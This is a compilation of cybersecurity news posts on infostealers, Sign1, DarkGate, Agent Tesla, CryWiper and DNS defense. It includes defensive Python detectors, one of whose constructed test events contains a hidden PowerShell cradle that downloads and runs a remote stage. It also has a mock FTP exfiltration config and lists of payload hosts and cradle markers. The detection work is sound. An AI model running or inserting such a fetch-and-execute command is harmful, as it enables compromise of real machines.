
Data-Stealing Malware Infections Surge by 600% in Three Years, Kaspersky Reports


The digital landscape has become increasingly treacherous, with a startling surge in data-stealing malware compromising millions of devices worldwide. According to cybersecurity firm Kaspersky, the number of devices infected with data-stealing malware has skyrocketed by over 600% in the past three years alone. This alarming trend underscores the urgent need for heightened vigilance and robust cybersecurity measures to safeguard personal and corporate data in an era plagued by relentless cyber threats. 

Kaspersky's Digital Footprint Intelligence data paints a grim picture: the number of compromised devices reached 10 million in 2023, a 643% increase since 2020. The threat from data-stealers has grown exponentially and now poses a significant risk to consumers and businesses. Particularly concerning is the sheer volume of log-in credentials pilfered from each infected device. 

On average, each compromised device surrenders a staggering 50.9 log-in credentials, encompassing a wide array of sensitive accounts ranging from social media and online banking services to cryptocurrency wallets and email accounts. This abundance of stolen credentials fuels the illicit underground economy, where cybercriminals peddle stolen data for profit. The actual scope of the problem may be even more extensive than reported, as Kaspersky's data draws insights from infostealer malware log files traded on underground markets. 

The clandestine nature of these transactions makes it challenging to quantify the full extent of the threat landscape accurately. According to Sergey Shcherbel, a cybersecurity expert at Kaspersky Digital Footprint Intelligence, the dark-web value of log files containing login credentials varies depending on their appeal and the method of sale. These credentials may be sold through subscription services, aggregators catering to specific requests, or exclusive shops offering freshly acquired login credentials to select buyers. 

Prices typically start at $10 per log file, highlighting the lucrative nature of stolen data in the cyber underground. The impact of data-stealing malware extends beyond individual devices, with a staggering 443,000 websites worldwide falling victim to compromised credentials in the past five years alone. In the .in domain associated with India, compromised accounts surged to over 8 million in 2023, underscoring the global reach and pervasive nature of the threat. 

As the threat landscape continues to evolve, organizations and individuals must prioritize cybersecurity as a fundamental aspect of their digital hygiene practices. Proactive measures such as robust antivirus software, regular software updates, and user education can help mitigate the risk of data breaches and protect sensitive information from falling into the wrong hands. 

The exponential rise in data-stealing malware serves as a stark wake-up call for individuals and organizations worldwide. By staying vigilant, informed, and proactive in combating cyber threats, we can collectively fortify our defenses and safeguard against the perils of the digital age.

Evasive Sign1 Malware Hits 39,000 WordPress Sites in Widespread Cyber Assault

In the past six months, a malware campaign tracked as Sign1 has compromised more than 39,000 WordPress sites, using malicious JavaScript injections to redirect visitors to scam pages. In a report published this week, Sucuri estimates that at least 2,500 sites were infected by the latest variant over the past two months alone. 

The attackers inject rogue JavaScript into legitimate HTML widgets or plugins, which gives them a place to plant arbitrary script alongside the site's own code. The disclosure came shortly after Check Point Software Technologies Ltd. reported a separate campaign, FakeUpdates, that was also targeting WordPress websites. 

Sign1 is hard to catch. It builds its redirect URLs dynamically using time-based randomization, which makes them difficult for security software to detect and block, and its code is obfuscated to resist detection. It also singles out visitors arriving from certain websites, including popular search engines and social media platforms, which is perhaps its most concerning feature. 

Sucuri's report puts the total at over 39,000 infected WordPress sites and notes that this referrer-based targeting suggests the attackers are deliberately focusing on users more likely to fall for scams. One Sucuri client was breached through a brute-force attack, so website owners should take immediate steps to protect their sites and visitors. 

The specifics of how other sites were compromised remain unclear, but the attackers are believed to have used a combination of brute-force attacks and plugin vulnerabilities to get into WordPress installations. Once inside, they typically inject the malicious JavaScript through custom HTML widgets or through the legitimate Simple Custom CSS and JS plugin. 

Sign1 evades conventional blocking by changing its URLs every 10 minutes through time-based randomization. Because the domains are registered shortly before they are used, they are usually not yet on blocklists. 

The attackers initially hosted on Namecheap and later moved to HETZNER, with Cloudflare in front of the domains to hide the origin IP addresses. The injected code is XOR-encoded and uses random variable names, which makes it hard for security tools to match. 

Sucuri's analysis shows that Sign1 has become steadily more sophisticated, stealthier and more resilient to blocking. Infections have risen sharply over the past six months, with new versions released roughly every week since the latest wave began in January 2024. 

Website administrators should therefore take extra precautions now and put robust protective measures in place to keep their sites secure. 

The researchers concluded that the campaign has been running for roughly six months and is still under active development. 

The campaign is ongoing, and infections spike whenever the developers release a new version. The latest variant, active since the beginning of January 2024, has hit about 2,500 sites so far.

To keep a site secure, the researchers recommend strong, unique usernames and passwords so that brute-force attacks do not succeed, and removing every unused or unnecessary plugin and theme, since each one the attackers can reach is a potential way in.

Colombian Government Impersonation Campaign Targets Latin American Individuals in Cyberattack


In a concerning development, a sophisticated cyberattack campaign has emerged, targeting individuals across Latin America by malicious actors who impersonate Colombian government agencies. These attackers have devised a cunning strategy, distributing emails containing PDF attachments that falsely accuse recipients of traffic violations or other legal infractions. 

The ultimate goal of these deceptive communications is to coerce unsuspecting victims into downloading an archive that conceals a VBS script, thereby initiating a multi-stage infection process. Initially, the script acquires the payload’s address from resources like textbin.net before proceeding to download and execute the payload from platforms such as cdn.discordapp(.)com, pasteio(.)com, hidrive.ionos.com, and wtools.io. 

This intricate execution chain progresses from PDF to ZIP, then to VBS and PowerShell, and finally to the executable file (EXE). The resulting payload is identified as one of several well-known remote access trojans (RATs), including AsyncRAT, njRAT, or Remcos. These malicious programs are notorious for their capability to provide unauthorized remote access to the infected systems, posing significant risks to victims’ privacy and data security. To combat this threat, cybersecurity professionals and researchers are urged to consult the TI Lookup tool for comprehensive information on these samples. 
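The PDF-to-EXE chain above is the kind of thing a detection engineer turns into a parent/child process rule. The following is an added example written for this post, not code from the researchers who reported the campaign: it walks Sysmon-style process-creation events (constructed here, with invented PIDs, user names and file names) and flags a script host that launches PowerShell with a download cradle pointing at the hosting platforms named in the post, followed by an executable dropped in a user-writable path. The marker lists and path patterns are assumptions chosen for the demo.

```python
"""
Detect the VBS -> PowerShell -> EXE chain in process-creation telemetry.
Added example; the events below are constructed, not captured.
"""
from dataclasses import dataclass

# Hosting platforms named in the post; everything else here is an assumption.
SUSPECT_HOSTS = ("textbin.net", "cdn.discordapp.com", "pasteio.com",
                 "hidrive.ionos.com", "wtools.io")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "iwr ", "net.webclient", "-enc", "-encodedcommand")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")


@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 fields needed for the rule."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def _name(image: str) -> str:
    """Basename of an image path, lower-cased."""
    return image.rsplit("\\", 1)[-1].lower()


def find_chains(events):
    """Return one finding per PowerShell process launched by a script host
    that also shows a cradle, a known payload host, or a dropped EXE."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if _name(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or _name(parent.image) not in SCRIPT_HOSTS:
            continue
        cl = e.cmdline.lower()
        reasons = []
        if any(m in cl for m in CRADLE_MARKERS):
            reasons.append("download cradle in PowerShell command line")
        hosts = [h for h in SUSPECT_HOSTS if h in cl]
        if hosts:
            reasons.append("payload host(s): " + ", ".join(hosts))
        dropped = [c for c in events
                   if c.ppid == e.pid and c.image.lower().endswith(".exe")
                   and any(p in c.image.lower() for p in USER_WRITABLE)]
        if dropped:
            reasons.append("spawned EXE from user-writable path: " + dropped[0].image)
        if reasons:
            findings.append({"script_host_pid": parent.pid,
                             "powershell_pid": e.pid, "reasons": reasons})
    return findings


# Constructed events: one malicious chain and two benign PowerShell launches.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\ana\Downloads\citacion_transito.vbs"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('https://cdn.discordapp.com/attachments/1/2/stage2.txt')\""),
    ProcEvent(400, 300, r"C:\Users\ana\AppData\Local\Temp\svchost_update.exe",
              "svchost_update.exe"),
    # benign: PowerShell started from the desktop shell with a local script
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
    # benign: an admin VBS that runs PowerShell without any cradle or drop
    ProcEvent(600, 100, r"C:\Windows\System32\cscript.exe",
              r"cscript.exe //nologo C:\scripts\inventory.vbs"),
    ProcEvent(700, 600, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\collect.ps1"),
]

if __name__ == "__main__":
    for f in find_chains(SAMPLE_EVENTS):
        print(f)
```

The rule keys on the parent relationship first and only then on content, so an administrator's VBS that runs a local PowerShell script (PIDs 600/700 above) is not flagged; the cradle, the payload host and the EXE dropped under AppData are each reported separately so an analyst can see which of the three fired.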

This resource can greatly assist in identifying and mitigating threats associated with this campaign. It’s essential to note that while this campaign targets individuals in Latin America, the technique employed by the attackers is adaptable and could be utilized against targets in other regions as well. The cybersecurity community must remain vigilant and proactive in defending against such sophisticated threats. Employing robust security measures, including up-to-date antivirus software, intrusion detection systems, and regular security awareness training for employees, is crucial. 

Additionally, organizations should implement strict email security protocols to prevent malicious emails from reaching employees' inboxes. Furthermore, individuals should exercise caution when interacting with unsolicited emails, especially those containing attachments or links. Verifying the legitimacy of email senders and carefully scrutinizing email content can help prevent falling victim to phishing attacks. It’s also advisable to avoid downloading attachments or clicking on links from unknown or suspicious sources. 

In conclusion, the emergence of this cyberattack campaign underscores the ever-present threat posed by malicious actors seeking to exploit vulnerabilities for their gain. By staying informed, adopting proactive security measures, and fostering a culture of cybersecurity awareness, organizations and individuals can better protect themselves against such threats and safeguard their digital assets and personal information.

Protecting User Privacy by Removing Personal Data from Data Broker Sites

Mozilla is offering Firefox users a new subscription service, Mozilla Monitor Plus, that finds and removes their personal and sensitive information from data brokers across the internet. 

The service targets phone numbers, email addresses, home addresses and other information that is routinely sold to data broker platforms for profit. It builds on Mozilla Monitor (previously known as Firefox Monitor), the free privacy-monitoring service Mozilla already offers, which is being revamped to strengthen user privacy.

Until now, Mozilla Monitor was a free service that notified users when their email accounts turned up in a breach. The roughly 10 million existing Mozilla Monitor users can now run scans to see whether their personal information has been exposed, with automatic removal available through the paid Monitor Plus tier. 

When an exposure is found, Monitor Plus provides the tools to get the user's information back out of circulation. Data broker websites make removal a convoluted and confusing process, and people often do not know who holds their personal information or how to get rid of it once they find it online.

However, most sites have either an opt-out page or require them to contact the broker directly to request removal. This process can be simplified by Mozilla Monitor, which searches across 190 data broker sites known for selling private and personal information proactively.

If any of the data the user provided, such as name, location or birthdate, turns up on those sites, Mozilla initiates a removal request on the user's behalf. Removal can take anywhere from a day to a month, depending on the broker. Monitor Plus costs $13.99 per month, or $8.99 per month on an annual subscription, and includes this feature. 

Users who do not want to subscribe can run a one-time free scan of the data broker sites, but they then have to work through the removal steps manually. That tedium may persuade some of them to upgrade to Monitor Plus, which automates the removals.

For data breaches, both free and paid users will continue to receive alerts and have access to guidance on fixing high-risk breaches. To start a free one-time scan, users provide their email address and a few personal details: first and last name, city, state and date of birth.

The tool then scans for potential exposures, reports them to the user and explains how they can be resolved. For users who want their data removed, Mozilla initiates the removal request on their behalf; users can view the status of each request and track its progress. 

After the information has been removed, Mozilla runs a monthly scan across the 190+ data broker sites to make sure it stays off them. Users must submit their first and last name, current city and state, date of birth and email address to initiate a scan; Mozilla's privacy policy covers this information, which is stored encrypted.

With this information, Mozilla scans for places where the user's personal information has been exposed through data breaches, brokers or websites that collect personal information. In 2023 alone, 233 million people were affected by data breaches, which is why a tool like this matters in the current environment. The Mozilla Monitor Plus subscription includes monthly scans and automatic removal of personal information found on data broker sites.

Ukraine Faces PurpleFox Malware Crisis: Unraveling the Ongoing Battle and Countermeasures


In a disturbing turn of events, the insidious PurpleFox malware has recently unleashed a wave of cyber havoc in Ukraine, infiltrating and compromising thousands of computers. This highly adaptable and elusive malware variant has sent shockwaves through the cybersecurity community, posing a significant challenge to both individuals and organizations alike. 

PurpleFox, renowned for its sophisticated tactics, primarily targets Windows-based systems by exploiting vulnerabilities, granting unauthorized access, and establishing a persistent presence within the infected devices. Armed with multifaceted capabilities such as data theft, remote command execution, and the ability to download and deploy additional malicious payloads, PurpleFox has proven a formidable adversary. 

Reports of compromised systems experiencing data breaches and operational disruptions are emerging, highlighting the malware's destructive potential. Its ability to remain dormant within systems makes detection an arduous task, further complicating the efforts of cybersecurity professionals to neutralize its impact. 

Security researchers point to various infection vectors, including malicious websites, infected email attachments, and stealthy drive-by downloads, as the primary means by which PurpleFox spreads. Its polymorphic nature, constantly mutating its code, renders traditional signature-based detection methods less effective, underscoring the need for advanced, adaptive cybersecurity measures. 

Prompted by the severity of the situation, Ukrainian authorities, alongside cybersecurity agencies, have initiated a concerted effort to contain and eliminate PurpleFox. Emergency response teams have been dispatched to affected regions to assess the extent of the damage and devise strategies for neutralizing the malware's threat. 

The motives behind the PurpleFox campaign in Ukraine remain mysterious, as the malware is a versatile tool often utilized for various cybercriminal activities, including espionage, data theft, and ransomware attacks. Investigations are underway to identify the perpetrators and their overarching objectives. 

To fortify defences against PurpleFox and similar threats, cybersecurity experts stress the importance of timely software updates, robust antivirus solutions, and comprehensive user education. Additionally, organizations are urged to implement network segmentation and closely monitor network traffic for anomalies that could signify a malware infection. 

This incident serves as a poignant reminder of the ever-evolving landscape of cyber threats. As cyber adversaries continually refine their tactics, a proactive and collaborative approach is indispensable to fortify digital defences and ensure the resilience of critical infrastructure. 

In conclusion, the PurpleFox malware outbreak in Ukraine underscores the critical importance of cybersecurity vigilance in our interconnected world. As the investigation unfolds, individuals and organizations must remain vigilant, adopting proactive measures to bolster their cybersecurity defences against the relentless evolution of cyber threats.

Sneaky USB Hackers Pose Threat on Favorite Sites


A financially motivated threat group has been found using USB devices to get into computer systems, hiding its malicious code in plain sight on widely used platforms such as GitHub, Vimeo and Ars Technica. 

By embedding the code in seemingly innocuous content, the group makes it hard to detect and block. Readers should stay vigilant when navigating these platforms. 

To be clear, the odd text strings found on GitHub and Vimeo do no harm when clicked. The twist is that they serve as a key tool for the attackers: malware already running on a victim's machine fetches and decodes them to download and deploy the next stage. 

The cybersecurity watchdogs, Mandiant, are actively monitoring this group of hackers identified as UNC4990. Operating in the shadows since 2020, they have specifically targeted individuals in Italy. 

The cyber assault unfolds with an unsuspecting individual clicking on a deceptive file on a USB drive. The mystery lies in how these USB devices find their way into the hands of unsuspecting users. Once opened, the file initiates a digital script, explorer.ps1, downloading an intermediary code that reveals a web address. This address acts as the gateway for installing a malware downloader named 'EMPTYSPACE.' 

UNC4990 initially employed special files on GitHub and GitLab but later shifted their tactics to Vimeo and Ars Technica, embedding their secret codes in mundane areas on these sites to avoid suspicion. The harmful PowerShell script, decoded, decrypted, and executed from legitimate sites, leads to the activation of EMPTYSPACE. This payload establishes communication with the hackers' control server, subsequently downloading a sophisticated backdoor called 'QUIETBOARD.' 

Additionally, UNC4990 uses this backdoor to mine cryptocurrency, including Monero, Ethereum, Dogecoin and Bitcoin. The traceable proceeds exceed $55,000, excluding Monero, whose transactions cannot be tracked. 

QUIETBOARD, UNC4990's advanced backdoor, exhibits a wide range of capabilities, including executing commands, cryptocurrency theft, USB drive propagation, screenshot capture, system information collection, and geographical location determination. Mandiant highlights UNC4990's penchant for experimentation to refine their attack strategies. 

Despite ongoing efforts to mitigate USB-based malware threats, they persist as a significant danger. The tactic of concealing within reputable sites challenges traditional security measures, underscoring the need for enhanced online safety practices. In the evolving digital landscape, staying informed and vigilant is paramount. Cyber threats may emerge from unexpected quarters, demanding a proactive approach to cybersecurity.

Compromised Skype Accounts Facilitate DarkGate Malware Spread


Cyber attackers wielding the DarkGate malware have utilized compromised Skype accounts as a vector to infiltrate targets between July and September. They accomplished this by dispatching messages with VBA loader script attachments. 

Trend Micro's security researchers, who detected these attacks, noted that this script is responsible for fetching a second-stage AutoIT script. This script, in turn, is tailored to deploy the final DarkGate malware payload.

Trend Micro explained that gaining access to the victim's Skype account provided the attacker with the ability to take control of an ongoing messaging thread. This allowed them to manipulate the naming of files to align with the context of the conversation. 

Although the means by which the initial accounts of instant messaging applications were compromised remains unclear, it is theorized to have occurred either through leaked login credentials available on underground forums or as a consequence of a prior breach of the parent organization.

Furthermore, Trend Micro observed instances where DarkGate operators attempted to deliver their malware payload through Microsoft Teams. This occurred in organizations where the service was set up to accept messages from external users. 

Previously, Truesec and Malwarebytes had identified phishing campaigns targeting Microsoft Teams users. These campaigns used malicious VBScript to deploy the DarkGate malware. The attackers reached users from compromised Office 365 accounts outside the targeted organizations and leveraged a tool named TeamsPhisher. 

This tool enabled the bypassing of restrictions on incoming files from external sources, enabling the transmission of phishing attachments to Teams users. The ultimate objective remained infiltrating the entire environment. Depending on the specific threat group employing the DarkGate variant, the threats ranged from ransomware to cryptomining.

Trend Micro's telemetry data indicated that DarkGate frequently led to the detection of tools commonly associated with the Black Basta ransomware group.

The use of the DarkGate loader for initial access into corporate networks has been on the rise, especially since the Qakbot botnet was dismantled in August by an international law-enforcement operation. 

Prior to the disruption of Qakbot, an individual claiming to be the developer of DarkGate sought to sell subscriptions on a hacking forum, pricing them at up to $100,000 annually. The malware was marketed with an array of features, including a concealed VNC, capabilities to evade Windows Defender, a tool for pilfering browser history, an integrated reverse proxy, a file manager, and a Discord token snatcher.

Subsequent to this announcement, there has been a noticeable surge in reported DarkGate infections via various delivery methods like phishing and malvertising.

This recent upswing in DarkGate activity highlights the escalating influence of this malware-as-a-service (MaaS) operation within the realm of cybercrime. It underscores the unwavering determination of threat actors to persist in their attacks, demonstrating adaptability in tactics and methods despite disruptions and obstacles.

Info-stealer Ransomware hit Government Organisations

Threat actors have targeted government entities with the PureCrypter malware downloader, which is being used to deliver several information stealers and ransomware variants.  

According to researchers at Menlo Security, the threat actor hosted the initial payload on Discord and used a compromised non-profit organization's server to host additional stages of the campaign. 

The campaign delivered several malware families, including Redline Stealer, Agent Tesla, Eternity, Black Moon and Philadelphia Ransomware, the researchers said. 

Several government organizations in the Asia Pacific (APAC) and North American regions have been targeted by the PureCrypter campaign, according to the researchers. 

Steps Involved in an Attack 

First, the attacker sends an email containing a Discord link to a password-protected ZIP archive, which holds the PureCrypter sample used to launch the attack. 

PureCrypter is a .NET malware downloader that has been in circulation since around March 2021. Its operator distributes other cybercriminals' malware for a fee. 

The PureCrypter sample carries no payload of its own. When executed, it fetches the next-stage payload from the compromised non-profit server, which doubles as the campaign's command-and-control server.  

Menlo Security examined an Agent Tesla sample from the campaign. As soon as it launches, the trojan connects to an FTP server based in Pakistan and uploads all of the stolen information there. 

The researchers found that the threat actor did not set up this FTP server; it was taken over using credentials leaked in an earlier breach. Using someone else's infrastructure reduces the attacker's exposure and makes attribution harder. 

The Use of Agent Tesla Continues 

Agent Tesla is a malware family that cybercriminals use to compromise Windows systems. Its usage peaked in October 2020 and January 2021. 

A recent Cofense report notes that Agent Tesla remains one of the most cost-effective and capable backdoors on the market and has been continuously improved and developed over its lifetime.

Agent Tesla accounted for roughly one-third of all keylogger reports recorded by Cofense Intelligence in 2022, a measure of how much of its activity is keylogging. 

The malware has the following capabilities: 

  • Record every keystroke the victim makes to capture sensitive information such as passwords. 
  • Steal saved passwords from web browsers, email clients and file-transfer applications. 
  • Capture screenshots of the victim's desktop as they work. 
  • Read clipboard contents, harvesting user names, passwords and credit card numbers. 
  • Send the stolen data to the C2 over FTP, SMTP or other channels.
In the attacks Menlo Labs examined, the threat actors evaded antivirus tools by injecting the Agent Tesla payload into a legitimate process ("cvtres.exe") using process hollowing. 

Agent Tesla's communications with the C2 server, as well as its configuration files, are XOR-encrypted to hide them from network traffic monitoring tools. 
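Both this post (Agent Tesla's XOR-encrypted C2 traffic and configuration) and the Sign1 post above (XOR-encoded injected JavaScript with random variable names) describe single-byte XOR as an obfuscation layer, and the first thing an analyst does with such a blob is brute-force the key. The block below is an added example written for this page, not code from Sucuri, Menlo Security, or either malware family: it tries every key, scores each candidate by how much it looks like plaintext, and returns the best one. Both sample blobs are constructed here; the "Date.now()/600000" bucket in the JavaScript sample is only a stand-in for the time-based URLs the Sign1 write-up describes, not the campaign's real algorithm, and the FTP string is an invented Agent-Tesla-style configuration.

```python
"""
Single-byte XOR triage: recover the key and plaintext of an obfuscated blob.
Added example; sample blobs are constructed, not captured artifacts.
"""
import string

PRINTABLE = frozenset(string.printable.encode("ascii"))
# Strings a decoded redirect script or exfil config would plausibly contain.
DEFAULT_KEYWORDS = (b"http", b"location", b"window", b"ftp", b"smtp")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (0-255). Applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def plaintext_score(candidate: bytes, keywords=DEFAULT_KEYWORDS) -> float:
    """Printable-ASCII ratio (0..1) plus one point per keyword found.
    Keyword matching is case-sensitive on purpose: XOR with 0x20 flips
    ASCII case, and a case-insensitive match would reward that wrong key."""
    if not candidate:
        return 0.0
    printable = sum(1 for b in candidate if b in PRINTABLE) / len(candidate)
    return printable + sum(1 for k in keywords if k in candidate)


def brute_force_xor(blob: bytes, keywords=DEFAULT_KEYWORDS):
    """Try every non-zero single-byte key; return (key, plaintext, score)."""
    best_key, best_plain, best_score = None, b"", -1.0
    for key in range(1, 256):
        cand = xor_bytes(blob, key)
        score = plaintext_score(cand, keywords)
        if score > best_score:
            best_key, best_plain, best_score = key, cand, score
    return best_key, best_plain, best_score


def recover(blob: bytes):
    """Convenience wrapper returning (key, plaintext) only."""
    key, plain, _ = brute_force_xor(blob)
    return key, plain


# Constructed sample 1: an injected-JS-style redirect, XORed with 0x5A.
SAMPLE_JS = (b'var _0x3f1a="https://redirect.invalid/go/"'
             b'+Math.floor(Date.now()/600000);window.location=_0x3f1a;')
SAMPLE_JS_BLOB = xor_bytes(SAMPLE_JS, 0x5A)

# Constructed sample 2: an Agent-Tesla-style FTP exfil config, XORed with 0x7E.
SAMPLE_CFG = b"ftp://203.0.113.7/logs|ftpuser|S3cret!|smtp:off"
SAMPLE_CFG_BLOB = xor_bytes(SAMPLE_CFG, 0x7E)

if __name__ == "__main__":
    for name, blob in (("js", SAMPLE_JS_BLOB), ("cfg", SAMPLE_CFG_BLOB)):
        key, plain = recover(blob)
        print(f"{name}: key=0x{key:02x} -> {plain.decode('ascii', 'replace')}")
```

The scoring deliberately weights keywords far above the printable ratio: many wrong keys produce mostly printable garbage, but almost none produce "http" or "window" by accident. For multi-byte XOR keys the same idea applies per key position after guessing the key length, which this single-byte version does not attempt.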

According to Menlo Security, the threat actor behind PureCrypter is not one of the big players in the threat landscape. Nevertheless, it is worth taking note of its activities to determine whether or not it is targeting government agencies. 

As a result, it would be expected that the attacker would continue to use the compromised infrastructure for as long as possible before seeking out a new one. 

Malware Attacks can be Thwarted by Tampering with DNS Communications


The notion that you can defend yourself against all malware is absurd, especially given that malware is a catch-all term that does not refer to any particular exploit, vector, objective, or methodology. There is no magic solution that will thwart every attack since the variety and breadth of cyber dangers are so great. As a result, it won't be long until your network environment is compromised, putting you in a position where you must make some extremely difficult choices. 

Successful cyberattacks, for instance, in the medical industry have significant legal and reputational ramifications in addition to affecting an organisation's capacity to function. These factors lead to medical business victims paying ransomware demands more frequently than those in any other sector. Healthcare institutions might save an average of $10.1 million per event avoided if they could spot warning signs of issues before they develop into full-blown attacks. 

None of the security solutions can completely stop all threats at the gate; instead, they each focus on a particular subset of malware and/or penetration pathways. Even if they could, the gate is occasionally completely skipped. As demonstrated by the Log4J exploit and the most recent compromise of the well-known Ctx Python package, "trusted" resource libraries hosted on websites like GitHub can be attacked by outside parties and used to disseminate malware payloads to a large number of endpoints without raising any alarm bells right away. 

Threats are present everywhere, not just online. By using the healthcare sector as an example once more, we can illustrate a different attack vector that can bypass all of your perimeter security: physical access. The majority of hospitals, doctors' offices, pharmacies, and other healthcare institutions rely on networked terminals and gadgets that are unintentionally left in locations where patients, visitors, or other unauthorised users can access them. In these circumstances, it makes little difference how well your network is protected from external attacks because a malicious party only needs to insert a USB stick or use a logged-in device to access malware, which compromises the network from within. 

It may look hopeless, but the vast majority of malware shares one dependency: the Domain Name System (DNS). DNS is a crucial choke point in the fight against cyber threats because more than 91% of malware uses DNS at some stage of the attack life cycle. 

When a malware infection first enters your network, it seeks to avoid detection. During this period it uses the network as a reconnaissance field, attempting to spread to other devices, locate important resources and compromise backup storage. 

This is also the period in which the malware must contact the attackers' command-and-control (C2) system to receive instructions and report the network details it has discovered. Like all other Internet traffic, it must first send a request to a domain name server in order to communicate with the outside world. Network administrators can use a protective DNS solution to monitor DNS traffic for signs of malicious behaviour and then act by blocking, quarantining or otherwise interfering with it.

Unfortunately, because new threats are constantly being developed and a physically initiated attack is always possible, businesses must be ready for the inevitable successful penetration of their networks. Once malware has gained access to your network, however, its use of DNS communication is nearly inevitable. A protective DNS solution can identify these unusual requests and stop them outright, rendering the malware inert so that you can begin cleaning up your systems and strengthening your defences for the next time.
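As an added illustration of the monitoring step described above (example code, not from the original article or any vendor product), the Python script below parses a constructed DNS query log, matches each name against a blocklist and two heuristics for tunnelling and algorithmically generated names, and returns a block/alert/allow decision per query. The log lines, the blocklist entry and the thresholds are all assumptions made for the example.

```python
import math

# Constructed DNS query log (timestamp, client, queried name, record type).
# Made-up lines for illustration; not real captured traffic.
SAMPLE_LOG = """\
2023-05-01T10:00:01 10.0.0.12 www.example.com A
2023-05-01T10:00:02 10.0.0.12 mail.example.com MX
2023-05-01T10:00:05 10.0.0.44 known-bad.invalid A
2023-05-01T10:00:06 10.0.0.44 q3k9x2m7v1b8n4z6.example.net A
2023-05-01T10:00:07 10.0.0.44 4a6f686e20446f65.data.example.org TXT
"""
BLOCKLIST = {"known-bad.invalid"}   # constructed; normally fed from threat intelligence

def shannon_entropy(text: str) -> float:
    """Bits per character; random-looking labels score close to log2(alphabet size)."""
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def classify(name: str) -> list[str]:
    """Return the reasons a queried name looks suspicious (empty means nothing noticed)."""
    reasons = []
    parts = name.lower().rstrip(".").split(".")
    # Match the full name or any parent domain against the blocklist.
    if any(".".join(parts[i:]) in BLOCKLIST for i in range(len(parts))):
        reasons.append("blocklisted")
    label = parts[0]
    if len(label) >= 16 and all(c in "0123456789abcdef" for c in label):
        reasons.append("hex-encoded label")        # data smuggled out inside query names
    elif len(label) >= 16 and shannon_entropy(label) > 3.5:
        reasons.append("high-entropy label")       # algorithmically generated C2 names
    return reasons

def analyse_log(text: str) -> list[dict]:
    """Parse log lines and decide an action per query: block, alert or allow."""
    decisions = []
    for line in text.splitlines():
        _ts, client, name, rtype = line.split()
        reasons = classify(name)
        if "blocklisted" in reasons:
            action = "block"   # sinkhole the answer so the C2 request never completes
        elif reasons:
            action = "alert"   # hand to the SOC; candidate for quarantine
        else:
            action = "allow"
        decisions.append({"client": client, "name": name, "type": rtype,
                          "action": action, "reasons": reasons})
    return decisions
```

Running `analyse_log(SAMPLE_LOG)` blocks the blocklisted query and raises alerts for the two suspicious labels while letting ordinary names through.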

Data Being Nuked by Malware Unseen Before in Russia's Courts and Mayors' Offices

According to Kaspersky and the Russian news outlet Izvestia, mayors' offices and courts in Russia are being attacked by never-before-seen malware that masquerades as ransomware but wipes data. 

Kaspersky researchers named it CryWiper, a nod to the file extension appended to files after they are destroyed. Kaspersky says its team has seen the malware deliver "pinpoint attacks" on Russian targets via a spyware program, while the Izvestia newspaper reported that the targets were a mayor's office and a city court. 

There was no immediate word on how many organizations were affected, how the malware erased data, or whether any data was successfully erased. 

Over the past decade, wiper malware has become increasingly common. Shamoon, discovered in 2012, caused havoc for Saudi Aramco and Qatar's RasGas. Four years later a reworked version of Shamoon was used against multiple organizations in Saudi Arabia. NotPetya, a self-replicating wiper that spread across the globe within hours, affected hundreds of thousands of computers worldwide and caused an estimated $10 billion in damage. 

The past year has seen a slew of new wipers emerge, among them DoubleZero, IsaacWiper, HermeticWiper, CaddyWiper, WhisperGate, AcidRain, Industroyer2, and ransom. 

Kaspersky reports that it has identified recent attacks carried out by CryWiper. After infecting a target, the malware leaves a note that reportedly demands 0.5 bitcoin and includes a wallet address for payment. 

Kaspersky's analysis of a sample shows that although the Trojan disguises itself as ransomware and extorts money from victims for 'decrypting' their data, it does not encrypt data at all; it deliberately destroys it on the affected computer. A study of the Trojan's code showed that this was not a developer mistake but the intended behaviour from the outset.

CryWiper shares some traits with IsaacWiper, which targeted organizations in Ukraine. Both wipers corrupt targeted files by overwriting their contents with pseudo-random numbers generated by the Mersenne Twister PRNG; this generator is rarely used, so the shared choice is striking. 

CryWiper also has a notable link to two ransomware families, Trojan-Ransom.Win32.Xorist and Trojan-Ransom.MSIL.Agent: all three ransom notes contain the same email address. 

Analyzing the CryWiper sample, Kaspersky found it to be a 64-bit Windows executable written in C++ and compiled with the GCC compiler from the MinGW-w64 toolkit. 

That toolchain choice is unusual: malware written in C++ is far more commonly built with Microsoft Visual Studio. 

One possible explanation is that the developers wanted to be able to port the code from Windows to Linux without going through a third-party compiler. 

Given the large number of Windows API calls CryWiper makes, however, portability seems an unlikely motive. More probably, the developer simply wrote the code on a non-Windows machine. 

A successful wiper attack often exploits weak network security. Kaspersky advises network engineers to take precautions using the following measures:

  • An endpoint protection solution based on behavioural analysis rather than file-based detection alone. 
  • A security operations centre that manages detection and response and takes action to resolve an intrusion once it is detected.
  • An email security system that detects malicious files and URLs in attachments and blocks them; this makes email, the most common attack vector, much harder to exploit. 
  • Regular penetration testing and red team engagements. Identifying and fixing vulnerabilities in the infrastructure reduces the attack surface available to intruders. 
  • Threat intelligence analysis and monitoring. Up-to-date knowledge of the tactics, tools and infrastructure intruders use is needed to detect and stop malicious activity promptly. 

Wiper malware is likely to continue to spread over the coming months, given Russia's invasion of Ukraine and other geopolitical conflicts around the world. 

